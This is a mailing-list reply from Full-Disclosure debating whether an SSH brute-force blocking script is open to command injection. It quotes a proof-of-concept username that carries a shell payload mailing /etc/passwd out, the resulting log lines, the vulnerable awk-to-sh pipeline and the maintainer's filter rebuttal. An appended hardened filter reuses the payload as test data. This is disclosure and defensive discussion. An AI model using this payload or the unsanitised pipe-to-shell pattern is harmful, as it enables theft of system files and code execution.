Re: [Full-disclosure] SSH brute force blocking tool



Tavis Ormandy wrote:

However, it is certainly possible. Here is an example.

#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)'
ssh -o "BatchMode yes" "a a $command"@$1

Which produces log entries like this:
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)
Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2

Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after it is
executed by cron.

The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s -i/'|sh

The results are obvious.

Incorrect. Did you look at the fix? It isn't unsanitized as you state:

Firstly, the data being passed is not coming through via /var/log/secure or /var/log/auth*; it's coming in via /etc/hosts.deny:

function IPT {

grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' /etc/hosts.deny|\
sed 's/::ffff://g'|\
awk '!/#/&&/\./&&!a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d 208.51.101.194 -p TCP --dport 22 -j REJECT"}'|\
awk '/iptables/&&!/#/&&!/-s -i/'|sh

}

[root@voip2 ~]# cat testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
2383274298734
sakjdhasiuwe
hacker
aaa
bbb
ccc
0wn3d
[root@voip2 ~]# grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44

So the buck stops there before it is put into the shell.



--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature
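Added example, not the blocking tool's code and not from either poster: a stricter variant of the hosts.deny filter quoted above, run over constructed sample lines (the addresses from the testing.deny listing, the junk lines, and the injected username from Tavis's log entries). It anchors the address pattern to the whole line, so only a bare address is accepted, and hands each address to iptables as a single argument instead of building a command string and piping it into sh. IPTABLES defaults to "echo iptables" so it can be run as a dry run.

```shell
#!/bin/sh
# Constructed sample of a hosts.deny written by the tool: real-looking
# addresses from the post, an IPv4-mapped form, junk, and the injected username.
SAMPLE_DENY='# hosts.deny written by the blocking tool (constructed sample)
89.96.238.226
219.146.59.225
::ffff:211.97.194.148
220.110.34.44
89.96.238.226
2383274298734
sakjdhasiuwe
a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@example.invalid)<${x}etc${x}passwd)
0wn3d'

# Keep only lines that consist of exactly one IPv4 address (each octet 0-255).
# A bare "grep -E" of the pattern accepts any line *containing* an address;
# the ^ and $ anchors reject everything that is not the address itself.
# The IPv4-mapped prefix is stripped first, duplicates are dropped in order.
extract_ips() {
    sed 's/^::ffff://' |
    grep -E '^(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])){3}$' |
    awk '!seen[$0]++'
}

# Pass each address to iptables as one argv element. Nothing is re-parsed by
# a shell, so even a line that slipped past the filter could not become a
# command. IPTABLES defaults to "echo iptables" (dry run, prints the rule).
deny_rules() {
    extract_ips | while read -r ip; do
        ${IPTABLES:-echo iptables} -A INPUT -s "$ip" -i eth0 -p tcp --dport 22 -j REJECT
    done
}

printf '%s\n' "$SAMPLE_DENY" | deny_rules
```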

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
